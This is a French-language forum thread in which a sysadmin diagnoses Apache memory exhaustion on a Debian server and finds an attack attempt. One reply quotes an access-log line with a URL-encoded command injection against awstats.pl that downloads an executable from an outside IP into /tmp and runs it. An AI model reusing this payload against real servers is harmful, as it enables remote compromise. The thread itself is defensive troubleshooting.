Serveur dédié qui crash

Serveur dédié qui crash - réseaux et sécurité - Linux et OS Alternatifs

Marsh Posté le 09-01-2006 à 22:58:40    

Bonjour,
 
Ma boite possède un serveur dédié chez Sivit pour rien vous cacher et depuis qu'on a "ouvert" un nouveau site dessus assez conséquent mais pas trop (1000 visites par jour env), j'ai de gros ennuis.
Apache grossit et fini par planter la machine entière (elle n'est pas plantée mais ne répond plus à rien sauf au ping) en saturant les 512 Mo de RAM. Ce qui est curieux, c'est que ça peut aller très très vite à raison de 30 Mo/s environ et j'ai intérêt à stopper Apache avant de saturer les 512 Mo sinon c'est dead. Et du coup, une fois Apache down, je récupère 350 Mo de RAM...
Après avoir matté le log d'accès d'Apache qui fait rien que pour aujourd'hui 8 Mo (!), je me demande si je ne suis pas la cible de flood ou bot ou que sais-je... Des IP zarbs de sites anglais, russes... qui scan toutes les secondes ou presque quelques fichiers et images du site.
Bref, il faut que je trouve très rapidement une solution sachant que ce site était auparavant sur un serv mutualité chez Amen (de l'ultra classique donc) et marchait très bien. Donc le serveur dédié est largement capable de le faire tourner. Il y juste eu redirection de DNS.
 
J'ai essayé quelques filtres IPTables sans succès, et je ne sais plus trop quoi faire...
Toute suggestion est la bienvenue, c'est assez urgent, merci.

Reply

Marsh Posté le 09-01-2006 à 22:58:40   

Reply

Marsh Posté le 09-01-2006 à 23:03:58    

Je passe plutôt dans la cat linux :jap: !


---------------
Filmstory : gardez trace des films que vous avez vu ! :D
Reply

Marsh Posté le 10-01-2006 à 08:10:11    

C'est la dernière version de Apache ?

Reply

Marsh Posté le 10-01-2006 à 10:46:36    

Apache/2.0.54 (Debian GNU/Linux) PHP/5.0.5-Debian-0.8~sarge1

Reply

Marsh Posté le 10-01-2006 à 11:02:31    

Peut être que le problème de fuite de mémoire provient du PHP5. Chez ton ancien hébergeur, c'était la version 5 de PHP d'utilisée ?
Si tu n'as pas besoin de PHP5, remet la version 4.

Reply

Marsh Posté le 10-01-2006 à 11:28:46    

J'ai besoin de PHP5, et effectivement c'était surement du PHP4 sur Amen.
C'est un site SPIP (www.spip.net), c'est donc pas du code développé par nos soins, il y aurait une fuite de mémoire en PHP5 sur SPIP, ya longtemps qu'on en aurait entendu parler je pense !
Le plus "drôle", c'est que là j'ai le monitor sous les yeux : Je passe sans crier garre de 250 Mo used / 250 Mo free à 480/20 ! En 10 secondes grand max ! Je viens de le laisser comme ça près à killer Apache avant que plus rien ne répondre, et je viens de repasser à 280/211.
 
C'est mystique ou quoi ? :o

Reply

Marsh Posté le 10-01-2006 à 11:42:15    

lalex a écrit :

Bonjour,
 
Ma boite possède un serveur dédié chez Sivit pour rien vous cacher et depuis qu'on a "ouvert" un nouveau site dessus assez conséquent mais pas trop (1000 visites par jour env), j'ai de gros ennuis.
Apache grossit et fini par planter la machine entière (elle n'est pas plantée mais ne répond plus à rien sauf au ping) en saturant les 512 Mo de RAM. Ce qui est curieux, c'est que ça peut aller très très vite à raison de 30 Mo/s environ et j'ai intérêt à stopper Apache avant de saturer les 512 Mo sinon c'est dead. Et du coup, une fois Apache down, je récupère 350 Mo de RAM...
Après avoir matté le log d'accès d'Apache qui fait rien que pour aujourd'hui 8 Mo (!), je me demande si je ne suis pas la cible de flood ou bot ou que sais-je... Des IP zarbs de sites anglais, russes... qui scan toutes les secondes ou presque quelques fichiers et images du site.
Bref, il faut que je trouve très rapidement une solution sachant que ce site était auparavant sur un serv mutualité chez Amen (de l'ultra classique donc) et marchait très bien. Donc le serveur dédié est largement capable de le faire tourner. Il y juste eu redirection de DNS.
 
J'ai essayé quelques filtres IPTables sans succès, et je ne sais plus trop quoi faire...
Toute suggestion est la bienvenue, c'est assez urgent, merci.


 
Je ne sais pas si ca vaut quelques chose et si t'as un droit de regard las-dessus. Est-ce que ton serveur, tu peux le pinger ? si oui, il est trés facile pour un marmoulin d'envoyer des quantités de données par le ping et pour peut qu'il mette une boucle infini, ca te "détruit" le serveur et accessoirement la machine ! Donc si tu peux renvoyer des time Out au ping extérieur, fais le, tu éviteras ce genre de déboire à mon sens....  
 
 
@+

Reply

Marsh Posté le 10-01-2006 à 11:44:59    

Ya rien de spécial dans les logs d'Apache à ce moment là ?


---------------
Filmstory : gardez trace des films que vous avez vu ! :D
Reply

Marsh Posté le 10-01-2006 à 12:18:21    

si :o
 
Ca sent le bon hack avec awstats :
 


211.50.11.4 - - [09/Jan/2006:10:35:25 +0100] "GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2072%2e136%2e74%2e248%2fkilloz%3bchmod%20%2bx%20killoz%3b%2e%2fkilloz;echo%20
YYY;echo|  HTTP/1.1" 404 216


Reply

Marsh Posté le 10-01-2006 à 12:22:45    

vérifie qu'il ne soit pas rooté :o


---------------
uptime is for lousy system administrators what Viagra is for impotent people - mes unixeries - github me
Reply

Marsh Posté le 10-01-2006 à 12:22:45   

Reply

Marsh Posté le 10-01-2006 à 12:26:22    

Cad ?
 
Ya un truk qui m'échappe aussi : D'après le log, il exploite awstats.pl mais tout accès à awstats.pl est protégé par .htaccess + .htpasswd. Donc à moins que le pirate ait réussit à obtenir le log / pass (me demande bien comment), je vois pas trop comment il peut utiliser awstats.pl pour générer du traffic...


Message édité par lalex le 10-01-2006 à 12:26:54
Reply

Marsh Posté le 10-01-2006 à 12:48:40    

Citation :

Cad ?


fait une recherche de rootkit sur ton serveur
http://www.chkrootkit.org/
 
ton hack (awstats.pl) tu l'as retrouvé dans quel log ? access.log ou error.log ?


Message édité par jlighty le 10-01-2006 à 14:23:40
Reply

Marsh Posté le 10-01-2006 à 14:08:18    

C'est le technicien Sivit qui m'a balancé la ligne du log... et j'ai beau chercher dans le access et error log du 9/1, je ne trouve pas la ligne en question :o
 
Bref, je suppose qu'il l'a bel et bien trouvé... Je suis en train de checker la maj de awstats en 6.5 (j'ai la 6.4).

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed